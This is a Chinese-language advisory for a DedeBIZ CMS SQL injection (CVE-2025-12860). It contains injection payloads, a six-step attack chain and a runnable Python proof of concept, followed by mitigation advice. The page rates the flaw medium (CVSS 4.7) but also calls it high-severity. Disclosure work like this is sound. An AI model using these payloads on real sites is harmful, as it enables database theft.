CVE-2025-12860 DedeBIZ CMS SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-12860

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

DedeBIZ CMS

漏洞概述

CVE-2025-12860是DedeBIZ CMS中存在的一个高危SQL注入漏洞。该漏洞被发现于DedeBIZ 6.3.2及之前版本中，攻击者可以通过构造恶意的orderby参数值来执行未经授权的SQL语句。DedeBIZ是一款基于PHP开发的内容管理系统，广泛应用于各类网站建设中。由于该漏洞位于管理后台的freelist_main.php文件中，攻击者需要具备管理员权限才能利用此漏洞。然而，一旦被成功利用，攻击者可以窃取数据库中的敏感信息，包括用户数据、配置信息等，甚至可能在某些情况下实现远程代码执行。漏洞利用代码已被公开披露，增加了该漏洞的实际威胁程度。

技术细节

该SQL注入漏洞存在于DedeBIZ管理后台的freelist_main.php文件中，具体问题出在orderby参数的处理上。程序在构建SQL查询语句时，直接将用户可控的orderby参数值拼接到SQL语句中，而未进行充分的输入验证和SQL语句过滤。攻击者可以通过在orderby参数中注入恶意的SQL代码，如ORDER BY 1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--等，来执行任意SQL查询。由于该漏洞位于管理后台，攻击者需要先获取管理员账户权限，但结合其他漏洞或弱口令策略，攻击者可能逐步获得高权限访问。成功利用后，攻击者可以读取数据库中的敏感数据，包括管理员密码哈希、用户个人信息等。

攻击链分析

STEP 1

步骤1

攻击者扫描目标网站，识别出使用DedeBIZ CMS的系统

STEP 2

步骤2

攻击者通过暴力破解、钓鱼或社工手段获取管理员账户凭据

STEP 3

步骤3

攻击者登录管理后台，访问freelist_main.php页面

STEP 4

步骤4

攻击者在orderby参数中注入恶意SQL语句，如ORDER BY 1 AND (SELECT...)

STEP 5

步骤5

服务器执行注入的SQL代码，攻击者获取数据库敏感信息或进一步利用

STEP 6

步骤6

攻击者利用获取的数据进行更深层次的渗透，如横向移动或持久化控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12860 DedeBIZ SQL Injection PoC
# Target: DedeBIZ CMS <= 6.3.2
# Endpoint: /admin/freelist_main.php
# Parameter: orderby

def exploit_sql_injection(target_url, cookie):
    """
    Exploit SQL injection in orderby parameter
    """
    headers = {
        'Cookie': cookie,
        'User-Agent': 'Mozilla/5.0'
    }
    
    # Payload to extract database version
    # Using time-based blind SQL injection
    payload = "1 AND (SELECT 1 FROM (SELECT SLEEP(5))x)"
    
    # Original request with malicious orderby parameter
    params = {
        'orderby': payload
    }
    
    print(f"[*] Targeting: {target_url}")
    print(f"[*] Sending malicious request...")
    
    try:
        response = requests.get(
            f"{target_url}/admin/freelist_main.php",
            params=params,
            headers=headers,
            timeout=10
        )
        
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response Length: {len(response.text)}")
        
        # Extract database version using UNION-based injection
        union_payload = "1 UNION SELECT 1,2,3,4,5,version(),7,8,9,10--"
        params['orderby'] = union_payload
        
        response = requests.get(
            f"{target_url}/admin/freelist_main.php",
            params=params,
            headers=headers,
            timeout=10
        )
        
        if '5.' in response.text or '8.' in response.text:
            print("[+] Database version extracted successfully!")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <admin_cookie>")
        print(f"Example: python {sys.argv[0]} http://target.com 'admin_id=xxx'")
        sys.exit(1)
    
    target = sys.argv[1]
    cookie = sys.argv[2]
    exploit_sql_injection(target, cookie)

影响范围

DedeBIZ CMS <= 6.3.2

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 使用Web应用防火墙规则拦截包含SQL注入特征的请求，特别是orderby参数中的特殊字符如单引号、括号、AND、OR等；2) 限制管理后台访问，仅允许可信IP地址访问；3) 临时禁用freelist_main.php功能或设置访问白名单；4) 加强对管理员账户的监控，及时发现异常登录行为；5) 实施双因素认证机制保护管理后台访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12860
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12860
3 Details https://www.cvedetails.com/cve/CVE-2025-12860/
4 VulDB https://vuldb.com/cve/CVE-2025-12860
5 Link https://github.com/ZZCTD/zz_test/issues/2
6 Link https://vuldb.com/?ctiid.331507
7 Link https://vuldb.com/?id.331507
8 Link https://vuldb.com/?submit.679111
9 Link https://github.com/ZZCTD/zz_test/issues/2